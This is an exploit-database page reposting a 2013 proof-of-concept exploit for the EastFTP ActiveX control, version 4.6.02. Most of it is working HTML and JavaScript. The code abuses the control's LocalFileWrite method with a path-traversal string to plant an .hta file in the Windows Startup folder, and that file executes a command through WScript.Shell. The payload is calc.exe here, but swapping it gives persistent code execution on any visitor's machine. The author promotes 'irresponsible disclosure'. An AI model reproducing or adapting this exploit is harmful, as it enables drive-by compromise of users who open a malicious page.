EastFTP Active-X Code Execution

2013.03.22
Credit: Dr_IDE
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################# # # EastFTP ActiveX Control 0Day # By: Dr_IDE # Vendor Homepage:http://www.ftpocx.com/download.htm # Version: 4.6.02 # # Self Promotion: http://irresponsibledisclosure.blogspot.com ################################################################# <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target'/></object> <script> var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta"; var king = "><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>"; var easy = 1; target.LocalFileWrite(sofa,king,easy); </script> <body> EaseFTP ActiveX Control 0-Day Local Exploit<br> By: Dr_IDE<br> Self Promotion: http://irresponsibledisclosure.blogspot.com<br> Vendor Homepage:http://www.ftpocx.com/download.htm<br> Version: 4.6.02<br> Class FtpLibrary<br> GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}<br> Number of Interfaces: 1<br> Default Interface: _FtpLibrary<br> RegKey Safe for Script: False<br> RegkeySafe for Init: False<br> KillBitSet: False<br> </body> </html>

References:

http://irresponsibledisclosure.blogspot.com
http://www.ftpocx.com/download.htm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top